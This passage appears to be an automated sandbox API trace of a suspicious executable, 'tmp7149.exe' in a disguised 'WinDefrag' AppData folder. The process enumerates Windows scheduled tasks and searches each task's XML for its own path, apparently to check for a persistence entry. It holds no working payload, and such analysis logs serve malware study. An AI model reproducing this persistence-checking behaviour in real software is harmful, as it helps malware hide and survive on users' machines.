D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.449] IUnknown:Release (This=0x328230) returned 0x0 [0169.449] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.449] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.450] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.450] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.450] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.450] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.450] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328100) returned 0x0 [0169.454] IRegisteredTaskCollection:get_Count (in: This=0x328100, pCount=0x18e390 | out: pCount=0x18e390*=2) returned 0x0 [0169.454] IRegisteredTaskCollection:get_Item (in: This=0x328100, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328270) returned 0x0 [0169.454] IRegisteredTask:get_Name (in: This=0x328270, pName=0x18e230 | out: pName=0x18e230*="AitAgent") returned 0x0 [0169.454] IRegisteredTask:get_Xml (in: This=0x328270, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n") returned 0x0 [0169.457] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.458] IUnknown:Release (This=0x328270) returned 0x0 [0169.458] IRegisteredTaskCollection:get_Item (in: This=0x328100, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328270) returned 0x0 [0169.458] IRegisteredTask:get_Name (in: This=0x328270, pName=0x18e230 | out: pName=0x18e230*="ProgramDataUpdater") returned 0x0 [0169.458] IRegisteredTask:get_Xml (in: This=0x328270, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n") returned 0x0 [0169.461] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.461] IUnknown:Release (This=0x328270) returned 0x0 [0169.461] IUnknown:Release (This=0x328100) returned 0x0 [0169.461] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328100) returned 0x0 [0169.463] ITaskFolderCollection:get_Count (in: This=0x328100, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.463] IUnknown:Release (This=0x328100) returned 0x0 [0169.463] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.463] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.463] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.465] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.465] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.465] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="Proxy") returned 0x0 [0169.465] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n") returned 0x0 [0169.468] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.469] IUnknown:Release (This=0x328230) returned 0x0 [0169.469] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.469] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.470] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.470] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.470] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.470] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.470] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.472] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.472] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.472] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="UninstallDeviceTask") returned 0x0 [0169.472] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0169.474] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.474] IUnknown:Release (This=0x328240) returned 0x0 [0169.474] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.475] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.475] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.475] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.475] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.475] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.476] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328110) returned 0x0 [0169.478] IRegisteredTaskCollection:get_Count (in: This=0x328110, pCount=0x18e390 | out: pCount=0x18e390*=3) returned 0x0 [0169.478] IRegisteredTaskCollection:get_Item (in: This=0x328110, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328280) returned 0x0 [0169.478] IRegisteredTask:get_Name (in: This=0x328280, pName=0x18e230 | out: pName=0x18e230*="SystemTask") returned 0x0 [0169.478] IRegisteredTask:get_Xml (in: This=0x328280, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0169.482] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.482] IUnknown:Release (This=0x328280) returned 0x0 [0169.482] IRegisteredTaskCollection:get_Item (in: This=0x328110, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328280) returned 0x0 [0169.482] IRegisteredTask:get_Name (in: This=0x328280, pName=0x18e230 | out: pName=0x18e230*="UserTask") returned 0x0 [0169.482] IRegisteredTask:get_Xml (in: This=0x328280, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0169.485] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.485] IUnknown:Release (This=0x328280) returned 0x0 [0169.485] IRegisteredTaskCollection:get_Item (in: This=0x328110, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328280) returned 0x0 [0169.486] IRegisteredTask:get_Name (in: This=0x328280, pName=0x18e230 | out: pName=0x18e230*="UserTask-Roam") returned 0x0 [0169.486] IRegisteredTask:get_Xml (in: This=0x328280, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n") returned 0x0 [0169.488] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.488] IUnknown:Release (This=0x328280) returned 0x0 [0169.488] IUnknown:Release (This=0x328110) returned 0x0 [0169.488] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328110) returned 0x0 [0169.489] ITaskFolderCollection:get_Count (in: This=0x328110, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.489] IUnknown:Release (This=0x328110) returned 0x0 [0169.489] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.489] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.489] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328120) returned 0x0 [0169.493] IRegisteredTaskCollection:get_Count (in: This=0x328120, pCount=0x18e390 | out: pCount=0x18e390*=3) returned 0x0 [0169.494] IRegisteredTaskCollection:get_Item (in: This=0x328120, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x3282b0) returned 0x0 [0169.494] IRegisteredTask:get_Name (in: This=0x3282b0, pName=0x18e230 | out: pName=0x18e230*="Consolidator") returned 0x0 [0169.494] IRegisteredTask:get_Xml (in: This=0x3282b0, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n") returned 0x0 [0169.496] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.496] IUnknown:Release (This=0x3282b0) returned 0x0 [0169.496] IRegisteredTaskCollection:get_Item (in: This=0x328120, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x3282b0) returned 0x0 [0169.496] IRegisteredTask:get_Name (in: This=0x3282b0, pName=0x18e230 | out: pName=0x18e230*="KernelCeipTask") returned 0x0 [0169.497] IRegisteredTask:get_Xml (in: This=0x3282b0, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n") returned 0x0 [0169.499] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.500] IUnknown:Release (This=0x3282b0) returned 0x0 [0169.500] IRegisteredTaskCollection:get_Item (in: This=0x328120, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x3282b0) returned 0x0 [0169.500] IRegisteredTask:get_Name (in: This=0x3282b0, pName=0x18e230 | out: pName=0x18e230*="UsbCeip") returned 0x0 [0169.500] IRegisteredTask:get_Xml (in: This=0x3282b0, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n") returned 0x0 [0169.502] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n 